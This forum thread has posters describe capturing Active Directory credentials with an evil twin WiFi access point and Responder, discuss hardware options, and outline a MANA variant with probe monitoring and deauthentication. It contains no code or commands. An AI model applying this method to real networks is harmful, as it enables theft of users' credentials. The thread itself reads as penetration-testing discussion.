Jump to content

Snagging AD credentials over WiFi


Recommended Posts


I have written a blog post on using mubix's discovery to grab AD creds using an Evil twin AP and Responder.



• no physical access required 

• no driver installations..

I can see that Tetra/Nano has Responder modules but not much info on using it. I don't have a Pineapple handy at the moment to try it out.

Anyone care to give this a go on tetra/nano? :wink:

Happy to answer any queries on working.


Link to comment
Share on other sites

I haven't tried it on anything but a raspberry pi zero, but I thought about the using the Nano to do it but have not got around to making it happen.  The Nano would be best, just plug it in and let it run.

Link to comment
Share on other sites

12 hours ago, zone13.io said:


My current setup - TP Link MR3020 + RPi3

Now trying to do it all on a RPi3.

This should be pretty straightforward with a Nano since it has a Responder module already.

Agreed and I have it set up on a PiZero and it works great with Raspbian lite.  The only problem I see with the Nano, is that 1.) it operates with OpenWRT and 2.) the amount of time it takes for the Nano to startup and get going might not be suitable for this type of attack 3.) the antenna,  It is, for being small, maybe to big of a device to carry around and pull this off as it is noticeable when plugged in.

Link to comment
Share on other sites

I think you misunderstood my method here b0N3z.. You don't need to plug in the Nano into the USB port... That happens to be the biggest advantage also.

If you see the demo videos on 2nd reply, you will see that the machines connect to rogue Ap and give up the creds. 

  • Upvote 1
Link to comment
Share on other sites

4 hours ago, kamileon said:

So could you just not use a MANA attack with this.  That way you dont have to know the SSID, just need to be within wifi range of the target. 

It can be done.. just need some tweaking with the configs..

Monitor client probes.. create evil twin for the Open WiFi probe.. Assign IP for client.. Wait till Responder snatches the creds, maybe do a couple of de-auths.. Importantly, avoid any DHCP, DNS, HTTP service conflicts..

For the PoC, I wanted to keep it as a simple targeted attack and so off-loaded the router function to an actual wifi router.. It was stable that way.. less tinkering to do..

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...